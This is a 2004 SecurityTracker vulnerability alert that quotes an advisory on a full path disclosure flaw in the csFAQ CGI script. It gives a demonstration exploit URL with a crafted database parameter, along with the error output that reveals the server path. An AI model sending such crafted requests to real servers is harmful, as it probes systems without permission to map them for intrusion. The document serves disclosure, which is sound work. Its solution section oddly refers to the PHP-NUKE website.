csFAQ Discloses Installation Path to Remote Users
|
|
SecurityTracker Alert ID: 1010597
|
|
SecurityTracker URL: http://securitytracker.com/id?1010597
|
|
CVE Reference: CAN-2004-0665
(Links to External Site)
|
Updated: Jul 15 2004
|
Original Entry Date: Jun 28 2004
|
Impact: Disclosure of system information
|
Exploit Included: Yes
|
Description: DarkBicho reported a vulnerability in csFAQ. A remote user can determine the installation path.
It is reported that a remote user can supply a specially crafted URL to cause the system to disclose the installation path. A demonstration
exploit URL is provided:
http://[target]/cgi-script/csFAQ/csFAQ.cgi?command=viewFAQ&database=/.darkbicho
The vendor has
reportedly been notified.
The original advisory is available at:
http://www.swp-zone.org/archivos/advisory-08.txt
|
Impact: A remote user can determine the installation path.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=14 (Links to External Site)
|
Cause: Access control error, Exception handling error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: DarkBicho <darkbicho@fastmail.fm>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 27 Jun 2004 17:44:09 -0700
From: DarkBicho <darkbicho@fastmail.fm>
Subject: Full path disclosure csFAQ
|
http://www.swp-zone.org/archivos/advisory-08.txt
-------------------------------------------------------------------------------------------------
:.: Full path disclosure csFAQ :.:
PROGRAM: csFAQ
HOMEPAGE: http://www.cgiscript.net/
BUG: Full path disclosure
DATE: 23/05/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho@peru.com
-------------------------------------------------------------------------------------------------
1.- Affected software description:
------------------------------
csFAQ An automated system for displaying FAQs (frequently asked
questions) written by
CGI Scripts.
2.- Description:
------------
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information.
:.: Examples:
http://www.attack.com/cgi-script/csFAQ/csFAQ.cgi?command=viewFAQ&database=/.darkbicho
/www/attack/cgi-script/csFAQ//%2f%2edarkbicho
Content-type: text/html
Software error:
1 at csFAQ.cgi line 1117.
3.- SOLUTION:
จจจจจจจจ
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the PHP-NUKE website for updates and official release details.
4.- Greetings:
---------
greetings to my Peruvian group swp, perunderforce and machado ;)
"EL PISCO ES Y SERA PERUANO"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho@peru.com
-------------------------------------------------------------------------------------------------
___________ ____________
/ _____/ \ / \______ \
\____ \\ \/\/ /| ___/
/ \\ / | |
/_____ __ / \__/\ / |____|
\/ \/
Security Wari Projects
(c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF
]----------------------------------------------
DarkBicho
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"
---------------------- The End ----------------------
|
|
